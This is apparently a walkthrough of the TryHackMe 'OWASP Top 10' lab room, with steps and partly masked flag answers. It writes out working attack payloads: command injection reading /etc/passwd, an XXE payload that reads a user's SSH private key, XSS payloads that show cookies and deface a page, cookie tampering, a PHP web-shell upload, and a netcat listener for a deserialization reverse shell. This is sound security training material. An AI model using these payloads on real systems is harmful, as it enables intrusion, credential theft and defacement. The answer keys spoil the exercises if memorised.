Owasp Top 10

• Tools
• Introduction
• Accessing machines
• [Severity 1] Injection
• [Severity 1] OS Command Injection
• [Severity 1] Command Injection Practical
• [Severity 2] Broken Authentication
• [Severity 2] Broken Authentication Practical
• [Severity 3] Sensitive Data Exposure (Introduction)
• [Severity 3] Sensitive Data Exposure (Supporting Material 1)
• [Severity 3] Sensitive Data Exposure (Supporting Material 2)
• [Severity 3] Sensitive Data Exposure (Challenge)
• [Severity 4] XML External Entity
• [Severity 4] XML External Entity - eXtensible Markup Language
• [Severity 4] XML External Entity - DTD
• [Severity 4] XML External Entity - XXE Payload
• [Severity 4] XML External Entity - Exploiting
• [Severity 5] Broken Access Control
• [Severity 5] Broken Access Control (IDOR Challenge)
• [Severity 6] Security Misconfiguration
• [Severity 7] Cross-site Scripting
• [Severity 8] Insecure Deserialization
• [Severity 8] Insecure Deserialization - Objects
• [Severity 8] Insecure Deserialization - Deserialization
• [Severity 8] Insecure Deserialization - Cookies
• [Severity 8] Insecure Deserialization - Cookies Practical
• [Severity 8] Insecure Deserialization - Code Execution
• [Severity 9] Components With Known Vulnerabilities - Intro
• [Severity 9] Components With Known Vulnerabilities - Exploit
• [Severity 9] Components With Known Vulnerabilities - Lab
• [Severity 10] Insufficient Logging and Monitoring
• What Next?

Room Link: https://tryhackme.com/r/room/owasptop10

 $$$$$$\  $$\      $$\  $$$$$$\   $$$$$$\  $$$$$$$\  
$$  __$$\ $$ | $\  $$ |$$  __$$\ $$  __$$\ $$  __$$\ 
$$ /  $$ |$$ |$$$\ $$ |$$ /  $$ |$$ /  \__|$$ |  $$ |
$$ |  $$ |$$ $$ $$\$$ |$$$$$$$$ |\$$$$$$\  $$$$$$$  |
$$ |  $$ |$$$$  _$$$$ |$$  __$$ | \____$$\ $$  ____/ 
$$ |  $$ |$$$  / \$$$ |$$ |  $$ |$$\   $$ |$$ |      
 $$$$$$  |$$  /   \$$ |$$ |  $$ |\$$$$$$  |$$ |      
 \______/ \__/     \__|\__|  \__| \______/ \__|      
                                                     
                                                     
                                                     
$$$$$$$$\  $$$$$$\  $$$$$$$\    $$\   $$$$$$\        
\__$$  __|$$  __$$\ $$  __$$\ $$$$ | $$$ __$$\       
   $$ |   $$ /  $$ |$$ |  $$ |\_$$ | $$$$\ $$ |      
   $$ |   $$ |  $$ |$$$$$$$  |  $$ | $$\$$\$$ |      
   $$ |   $$ |  $$ |$$  ____/   $$ | $$ \$$$$ |      
   $$ |   $$ |  $$ |$$ |        $$ | $$ |\$$$ |      
   $$ |    $$$$$$  |$$ |      $$$$$$\\$$$$$$  /      
   \__|    \______/ \__|      \______|\______/       
                                                     
                                                     

Badges: https://tryhackme.com/ZishanAdThandar/badges/owasp-10

Tools

• sqlite3
• Cracktation.net
• Browser Debugging Tools (CTRL+SHIFT+I)
• Browser Source Code Viewer (CTRL+U)

Introduction

• Join the machine
• Read Instructions and click on Complete.

  Accessing machines

• Goto Access and get ovpn file to connect https://tryhackme.com/access
• Or, Start attackbox for testing.

  [Severity 1] Injection

• Read carefully this section and click on Complete.

  [Severity 1] OS Command Injection

• Read this section and mentioned article, then click on Complete.

  [Severity 1] Command Injection Practical

• Start Machine and get Target IP from “Target Machine Information”. Now, open http://machine_ip/evilshell.php.
• Now, type commands and submit. You can see output below.
• Question What strange text file is in the website root directory? Answer drpepper.txt. Running ls command will show this strange text file.
• Question How many non-root/non-service/non-daemon users are there? Answer 0. Running cat /etc/passwd will show.
• Question What user is this app running as? Answer www-data. Used command whoami.
• Question What is the user's shell set as? Answer /usr/sbin/nologin. Command used getent passwd www-data or cat /etc/passwd |grep www-data.
• Question What version of Ubuntu is running? Answer ``. Command used lsb_release -a.
• Question Print out the MOTD. What favorite beverage is shown? Answer DR PEPPER. Used command cat /etc/update-motd.d/00-header.

  [Severity 2] Broken Authentication

• Read this section carefully and click on Complete.

  [Severity 2] Broken Authentication Practical

• If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information” and open http://MACHINE_IP:8888.
• Question What is the flag that you found in darren's account? Answer fe860794************74b667. To get flag inside darren’s account, register as “ darren” and login. Here you need to use whitespace before darren’s name.
• Test same trick with user arthur and click on Complete.
• Question What is the flag that you found in arthur's account? Answer d9ac0f7************75e16e.

  [Severity 3] Sensitive Data Exposure (Introduction)

• If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information”.
• Read this section carefully and click on Complete.

  [Severity 3] Sensitive Data Exposure (Supporting Material 1)

• Read this section carefully and click on Complete.

  [Severity 3] Sensitive Data Exposure (Supporting Material 2)

• Read this section carefully and click on Complete.

  [Severity 3] Sensitive Data Exposure (Challenge)

• If we open the machine link and check source, we can get a image link to http://machine_ip/assets/images/lake-taupo.jpg.
• Now if we navigate to http://machine_ip/assets directory, there is a sensitive databse file named webapp.db.
• Question What is the name of the mentioned directory? Answer /assets.
• Question Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data? Answer webapp.db. It’s a file inside /assets.
• Now Downloding the file and analyzing the file with file webapp.db command shows it’s a sqlite3 file. Now, we can read the db file with sqlite3 webapp.db.
• If we use .table command to get table names, we will see there is two table named session and users. We can get column names using PRAGMA table_info(users); command.

    $> sqlite3 webapp.db 
     SQLite version 3.37.2 2022-01-06 13:25:41
     Enter ".help" for usage hints.
    sqlite> .tables
    sessions  users   
    sqlite> PRAGMA table_info(users);
    0|userID|TEXT|1||1
    1|username|TEXT|1||0
    2|password|TEXT|1||0
    3|admin|INT|1||0
    sqlite> 
  

• select * from users; will show user’s details inside the table. We can get admin hash there 6eea9b7ef191*******0f6c05ceb.

    sqlite> select * from users;
    4413096d9c933359b898b6202288a650|admin|6eea9b7ef191******f6c05ceb|1
    23023b67a32488588db1e28579ced7ec|Bob|ad0234829205b9033196ba818f7a872b|1
    4e8423b514eef575394ff78caed3254d|Alice|268b38ca7b84f44fa0a6cdc86e6301e0|0
    sqlite> 
  

• Question Use the supporting material to access the sensitive data. What is the password hash of the admin user? Answer 6eea9b7ef191*****dd0f6c05ceb.
• Question What is the admin's plaintext password? Answer qwe****op. We can crack the hash using CrackStation.
• Question Login as the admin. What is the flag? Answer THM{Yzc2Yjd*************diMjdl}. If we goto http://machine_ip/login and login with username admin and the cracked password qw*****iop, it will redirect to http://machine_ip/console/. There we can get the flag.

  [Severity 4] XML External Entity

• If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information”.
• Read this section carefully and click on Complete.

  [Severity 4] XML External Entity - eXtensible Markup Language

• Read this section carefully and then start answering.
• Question Full form of XML Answer eXtensible Markup Language
• Question Is it compulsory to have XML prolog in XML documents? Answer No
• Question Can we validate XML documents against a schema? Answer Yes
• Question How can we specify XML version and encoding in XML document? Answer xml prolog

  [Severity 4] XML External Entity - DTD

• Question How do you define a new ELEMENT? Answer !ELEMENT
• Question How do you define a ROOT element? Answer !DOCTYPE
• Question How do you define a new ENTITY? Answer !ENTITY

  [Severity 4] XML External Entity - XXE Payload

• Read this section carefully and click on Complete.

  [Severity 4] XML External Entity - Exploiting

• Now open http://machine_ip
• Used given payload in last section to print falcon feast and clicked on Complete.
• Again used payload from last section to read /etc/passwd and clicked on complete.
• Question What is the name of the user in /etc/passwd Answer falcon. We read it from output of last payload.
• Now we can use same payload with replacing file from /etc/passwd to ssh file location /home/falcon/.ssh/id_rsa.
• Question Where is falcon's SSH key located? Answer /home/falcon/.ssh/id_rsa.
• New payload to read SSH file,

   <?xml version="1.0"?>
   <!DOCTYPE root [<!ENTITY read SYSTEM '/home/falcon/.ssh/id_rsa'>]>
   <root>&read;</root>
  

• Question What are the first 18 characters for falcon's private key Answer MIIEogI****CAQEA7b

  [Severity 5] Broken Access Control

• Read this section carefully and click on Complete.

  [Severity 5] Broken Access Control (IDOR Challenge)

• If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information”.
• Read and understand how IDOR works and click on Complete.
• Open http://machine_ip/ and login with username note and password test123, then click on Complete.
• Question Look at other users notes. What is the flag? Answer flag{fivef***three}. Got it by changing note id to 0 and visiting link http://machine_ip/note.php?note=0.

  [Severity 6] Security Misconfiguration

• If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information”.
• Read this section carefully, deploy the vm and click on Complete.
• If we open the machine_ip, we can get a webapp name Pensive Notes. After googling I got default username password in a github repo https://github.com/NinjaJc01/PensiveNotes. Default credential of Pensive Notes is pensive:PensiveNotes.
• Question Hack into the webapp, and find the flag! Answer thm{4b95139*******a1f9d672e17}

  [Severity 7] Cross-site Scripting

• If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information”.
• Read this section carefully, deploy the vm and click on Complete.
• Question Navigate to http://machine_ip in your browser and click on the "Reflected XSS" tab on the navbar; craft a reflected XSS payload that will cause a popup saying "Hello". Answer ThereIsMoreToXSSThanYouThink. Used payload <script>alert("Hello")</script>, PoC link http://machine_ip/reflected?keyword=%3Cscript%3Ealert(%22Hello%22)%3C/script%3E
• Question On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address. Answer ReflectiveXss4TheWin. Used payload <script>alert(window.location.hostname)</script>, PoC link http://machine_ip/reflected?keyword=%3Cscript%3Ealert(window.location.hostname)%3C/script%3E
• Now goto http://machine_ip/stored and create an account.
• Question Then add a comment and see if you can insert some of your own HTML. Answer HTML_T4gs. Commented <img> in http://machine_ip/stored.
• On the same page, create an alert popup box appear on the page with your document cookies. Answer W3LL_D0N3_LVL2 Payload used <script>alert(document.cookie)</script>
• Now used payload to change title from to. Payload used <script>document.querySelector("#thm-title").textContent="I am a hacker"</script>.
• Question Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript. Answer websites_can_be_easily_defaced_with_xss

  [Severity 8] Insecure Deserialization

• If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information”.
• Read this section carefully.
• Question Who developed the Tomcat application? Answer The Apache Software Foundation
• Question What type of attack that crashes services can be performed with insecure deserialization? Answer Denial of Service

  [Severity 8] Insecure Deserialization - Objects

• Read this section.
• Question if a dog was sleeping, would this be: A) A State B) A Behaviour Answer A Behaviour

  [Severity 8] Insecure Deserialization - Deserialization

• Read this section.
• Question What is the name of the base-2 formatting that data is sent across a network as? Answer binary

  [Severity 8] Insecure Deserialization - Cookies

• Read this section carefully.
• Question If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be? Answer webapp.com/login/
• Question What is the acronym for the web technology that Secure cookies work over? Answer https

  [Severity 8] Insecure Deserialization - Cookies Practical

• Open http://machine_ip/register, create a account and login.
• Press CTRL+SHIFT+I and goto Storage section to read and edit cookies.
• Copy value of sessionId cookie and decode it with base64 decoder. Command to decode base64, echo "gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAN2Y1MWRiYWFhZjY2NDYwMzkyNTNiNTlkOTY3NTAwYWVxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==" |base64 -d. You will get the first flag.
• Question 1st flag (cookie value) Answer THM{good******se64_huh}
• Then edit userType cookie value to admin from user and reload the page and it will redirect to the admin page and show the flag.
• Question 2nd flag (admin dashboard) Answer THM{heres******in_flag}

  [Severity 8] Insecure Deserialization - Code Execution

• Start listner to listen with nc -lvp 4444 command.
• Change cookie userType value to user from admin. Open http://machine_ip/myprofile, then click on Exchange on vim and after that feedback. Give feedback.
• We need to follow instructions carefully. First we need to change download pickleme.py and “YOUR_TRYHACKME_VPN_IP” with your TryHackMe VPN IP. To get IP of TryHackMe you can use ifconfig tun0 |grep destination |cut -d" " -f10 command. Then run the python script with python3 pickleme.py. Copy the cookie and add a cookie with that value, name it encodedPayload. Reload feedback page. You will get a netcat shell. You can read flag using cat ../flag.txt command.
• Question flag.txt Answer 4a69a7***fd68

  [Severity 9] Components With Known Vulnerabilities - Intro

• Read Instructions and click on Complete.

  [Severity 9] Components With Known Vulnerabilities - Exploit

• Read Instructions and click on Complete.

  [Severity 9] Components With Known Vulnerabilities - Lab

• If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information”.
• When we open http://machine_ip, we get link to http://machine_ip/admin.php and projectworlds.in link. After searching bookstore on projectworlds.in, we get this page https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ with default credential username: admin@admin.com password: admin.
• After logging into admin panel, we can upload our shell by editing any book. Shell code, <?php system('wc -c /etc/passwd'); ?> in shell.php. After going to edit book, upload shell.php with change button.
• Now to find the shell, open location of image. You can find all images in /bootstrap/img directory. Just open the directory in the link, you can get your uploaded shell there, http://machine_ip/bootstrap/img/shell.php. If you open the page, it will compile and execute the code to display character number of /etc/passwd.
• Question How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer) Answer 1611

  [Severity 10] Insufficient Logging and Monitoring

• Read this section carefully.
• Question What IP address is the attacker using? Answer 49.99.13.16. We can check lot of unauthorized login from this ip.
• Question What kind of attack is being carried out? Answer Bruteforce. As we can see many unatuthorized usernames requested.

  What Next?

• Just click Complete. Done!

Author: Zishan Ahamed Thandar